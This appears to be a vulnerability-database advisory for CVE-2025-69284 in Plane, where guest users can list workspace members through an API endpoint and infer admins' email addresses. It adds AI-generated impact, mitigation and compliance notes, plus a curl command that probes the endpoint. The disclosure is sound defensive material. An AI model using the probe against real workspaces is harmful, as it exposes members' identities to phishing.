CVE-2025-69284
Unknown Unknown - Not Provided
Information Disclosure via Unauthorized Workspace Member Listing in Plane.io Prior to

Publication date: 2026-01-02

Last updated on: 2026-02-25

Assigner: GitHub, Inc.

Description
Plane is an an open-source project management tool. In plane.io, a guest user doesn't have a permission to access https[:]//app[.]plane[.]so/[:]slug/settings. Prior to Plane version 1.2.0, a problem occurs when the `/api/workspaces/:slug/members/` is accessible by guest and able to list of users on a specific workspace that they joined. Since the `display_name` in the response is actually the handler of the email, a malicious guest can still identify admin users' email addresses. Version 1.2.0 fixes this issue.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-01-02
Last Modified
2026-02-25
Generated
2026-06-16
AI Q&A
2026-01-02
EPSS Evaluated
2026-06-15
NVD
CVE-2025-69284
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
plane plane 1.1.0
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-284 The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2025-69284 is a vulnerability in plane.io versions prior to 1.2.0 where a guest user can access the API endpoint `/api/workspaces/:slug/members/` to retrieve a list of all members in a workspace they joined. Although guests cannot access workspace settings, the API response includes a `display_name` field that reveals the email handler (the part before '@') of users, allowing a malicious guest to infer admin and other users' email addresses. This is due to improper access control. [1]

Impact Analysis

This vulnerability can impact you by exposing the email handlers of workspace members, including admins, to guest users without requiring elevated privileges or user interaction. This compromises the confidentiality of user identities, potentially enabling targeted phishing or social engineering attacks. [1]

Detection Guidance

You can detect this vulnerability by attempting to access the API endpoint `/api/workspaces/:slug/members/` as a guest user on your Plane instance. If you receive a list of workspace members including the `display_name` field, your system is vulnerable. A simple command using curl would be: `curl -i -X GET https://app.plane.so/api/workspaces/<slug>/members/` replacing `<slug>` with your workspace identifier. If the response returns member information without proper authorization, the vulnerability exists. [1]

Mitigation Strategies

The immediate mitigation step is to upgrade your Plane installation to version 1.2.0 or later, where this access control issue has been fixed. Until the upgrade, restrict guest user access to the `/api/workspaces/:slug/members/` endpoint to prevent unauthorized disclosure of member information. [1]

Compliance Impact

This vulnerability exposes user identity information by allowing guest users to infer email addresses of admins and other workspace members without proper authorization. Such unauthorized disclosure of personal data could lead to non-compliance with data protection regulations like GDPR and HIPAA, which require safeguarding personal and sensitive information against unauthorized access and disclosure. [1]

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2025-69284. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart